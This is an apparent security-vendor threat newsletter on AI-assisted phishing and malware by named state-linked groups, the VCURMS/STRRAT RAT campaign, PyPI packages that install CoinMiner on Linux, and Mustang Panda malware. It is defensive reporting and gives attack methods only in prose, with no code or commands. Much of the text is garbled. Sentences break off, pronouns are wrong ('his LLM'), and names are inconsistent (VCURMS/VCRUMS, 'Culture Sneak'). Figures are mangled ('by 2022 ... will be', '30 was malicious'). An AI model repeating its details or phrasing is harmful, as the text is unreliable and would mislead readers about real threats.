The level of global cyber threats continues to increase due to global political instability centered on the Middle East, Ukraine, China and Taiwan. The number of cybersecurity incidents continues to rise, and their impact continues to grow. Organizations of all sizes and sectors need to increase their awareness of both the overall threat environment and the threats specifically relevant to their organization or industry. Threat hunting, offered as part of Marcum Technology's managed security services, can help provide this visibility when identifying potential risks to your organization.
Below are the top four threats that have emerged over the past month.
Stay ahead of threat actors in the age of AI
While some financial analysts are concerned about the possibility of an artificial intelligence (AI)-induced bubble due to the technology's failure to deliver on its lofty promises, security analysts The list is based on the exact capabilities, speed, and scale of operations that threat actors fear most.
Over the past year, we have seen the speed, scale, and sophistication of attacks increase in conjunction with the Large Language Model (LLM). But thankfully, AI can and is being leveraged if defenders deploy it quickly.
AI has the potential to largely eliminate classic grammar/spelling errors found in phishing emails. Furthermore, the complexity/power of the particular script that an attacker wants to create increases with this assistance, greatly increasing the chance of a successful attack.
The ability of AI to accurately translate material, explain a given concept, and generate solutions to problems reduces the gap between non-English speaking attackers and the rest of the internet. Language barriers continue to disappear. AI’s ability to provide the right advice and solve problems when properly prompted is amazing and continues to reduce the overhead of any attack.
On the obvious phishing front, North Korean cybercrime group Emerald Sleet is launching spear phishing attacks against foreign individuals in possession of valuable information. The group uses AI to investigate known vulnerabilities, troubleshoot technical issues, and even provide a type of technical support to help learn different technologies.
Crimson Sandstorm is another Iranian cybercrime group that also uses AI for the most obvious purpose of creating phishing emails, and to good effect. To that end, they are trying to lure political dissidents to his website and leak information. Another very powerful use is his LLM generation of scripts and code snippets to create malware. Additionally, the use of AI to aid in the development of obfuscation/evasion code was also highlighted.
Charcoal Typhoon, a cybercrime group originating from China, targets the government, higher education, telecommunications, oil and gas, and IT industries. This group has been using AI in much the same way. Combined with their previously demonstrated offensive capabilities and desire to create their own LLM, this is a particularly worrying threat.
The bottom line is that AI won't solve every problem, but it can help solve them more efficiently and effectively. Like any other tool, it is used on both sides of a conflict, either for productive and defensive purposes, or for malicious purposes by an increasingly proliferating threat actor. But as this technology makes attackers of all sizes more dangerous and capable, another worrisome AI-powered cyber threat is quietly winning the war: It seems that even little is known about it. It is estimated that by 2022, approximately 50% of internet traffic will be generated by bots. Of that 50%, 30 was malicious bot traffic. In most cases, this was ticket scalping, promoting fraud, or engaging in other forms of spam.
But with the introduction of AI, a strange trend is emerging. It's when completely fake social media profiles engage in social media conversations and comments with no obvious scam, sales pitch, or motive other than appearing like a real person in a real conversation. It means that there is. This is probably the most concerning. Because while cybersecurity experts are trying to put out fires caused by attackers involved in espionage and financially motivated attacks, the most serious threats go largely unnoticed. The long-term effects of such trends are almost impossible to imagine, much less easily countered.
VCURMS and STRRAT phishing campaigns
FortiGuard Labs has discovered a phishing campaign distributing a malicious Java downloader to spread the new VCURMS and STRRAT remote access Trojans (RATs). Attackers stored their malware on public services like AWS and GitHub using commercial protectors to avoid detection.
Phishing emails targeted staff, asking them to click a button to confirm payment information and download a malicious JAR file. JAR files obfuscated with “Sense Shield Virbox Protector” downloaded additional malware.
One of these, called VCRUMS, is a separate RAT with the filename “windows.jar” and communicates via a Protonmail email address for command and control. It also replicated itself to the startup folder and identified victims by computer name and volume ID. The keylogger and password recovery malware used by the RAT were also hosted on his AWS and disguised with a .jpg extension. VCRUMS ultimately steals account information from apps and collects cookies, autofill data, browsing history, and passwords from browsers such as Discord, Steam, Brave, Chrome, Edge, Firefox, Opera, OperaGX, Vivaldi, and Yandex.
STRRAT, which employs Allatori obfuscation and Branchlock obfuscation tools, was also utilized. A configuration file decrypted with the AES algorithm revealed a command and control server and the identity 'Khonsari'.
This multi-pronged attack campaign focused on obfuscation techniques to evade detection and the use of email for command and control communications, deploying a variety of malicious programs simultaneously.
In late December, FortiGuard's detection system identified three Python Package Index (PyPI) packages that, when used, install CoinMiner on Linux. These are named modularseven-1.0, driftme-1.0, and catme-1.0 and were released by a user named “sastra”. These new packages are similar to the “culturestreak” packages that were prevalent in late 2023, as the attack phases involved are very similar.
PyPI package installs CoinMiners on Linux machines
The attack begins in the package's __init__.py file and triggers the processor.py module to decode strings into shell commands. This command retrieves the script “unmi.sh” that hosts the second attack stage. The “unmi.sh” script downloads two important items: the mining configuration “config.json” and the CoinMiner executable file where the actual damage occurs.
An attacker can add commands to the ~/.bashrc file to ensure persistence on older machines and operating systems, allowing the malware to be reactivated during a new Bash session. According to VirusTotal, the CoinMiner ELF file that is downloaded along with the config.json file is already known to be malicious by a significant number of security vendors.
The package's indicators of compromise (IoCs) match those of 'culturestreak' and the files are hosted in a GitLab repository previously associated with the domain 'papiculo.net' and the blocked user. IoC suggests that the attackers behind this his PyPI malware may be the same ones that were behind it when Culture Sneak was active, but now using a new account I am active in
These packages have made advances in concealing their payloads and maintaining functionality, particularly by using external “unmi.sh” files to evade detection and inject malicious commands into ~/.bashrc for persistence. is shown. This indicates that attackers are increasing their tactics to extend and conceal their exploits.
These packaging trends call for improved detection capabilities within the security community and highlight the importance of diligence when dealing with code from unverified sources. This incident illustrates the continuing evolution of malware tactics and the need for continued vigilance. Only run code on your system if it comes from a verified source that is guaranteed to be clean and free of malicious processes.
New Mustang Panda malware package
During the ASEAN-Australia special summit in March 2024, researchers discovered evidence of cyber threats targeting Asian countries. Two different malware packages occurred at the same time as Summit and are believed to be the work of a threat actor known as Mustang Panda, also known as Camaro Dragon, Earth Preta, and Stately Taurus.
The first package, named “Talking_Points_for_China.zip”, was created on March 4, 2024 and distributed to organizations in the Philippines, Japan, and Singapore. His ZIP archive contained two files containing an executable disguised as a legitimate anti-keylogging program. Once executed, the malware sideloads a malicious DLL and initiates connections to potentially harmful IP addresses.
In a change in tactics, a second package labeled “Note PSO.scr” appeared on March 5, 2024, targeting businesses in Myanmar. Unlike previous methods, this package utilized the screensaver executable (SCR) file extension to deliver its payload. Once opened, it attempted to download a malicious file from a specific URL disguised as a benign program to avoid detection.
Additionally, recently discovered network connections between ASEAN affiliates and China's APT Group Command and Control (C2) infrastructure indicate a compromised environment. This highlights that ASEAN countries are attractive targets for espionage because of their involvement in sensitive regional issues.
Timeline analysis revealed a clear pattern of activity in China, with significant stagnation during holidays and special business days. This consistent behavior suggests an organized and planned cyber espionage operation. Organizations are being urged to use this information to strengthen their defenses against such threats, highlighting the importance of proactive cybersecurity measures.
If you are facing challenges related to cybersecurity threats, breaches, and fraud, or would like to learn more about identifying potential threats to your organization, contact Marcum Technology today.
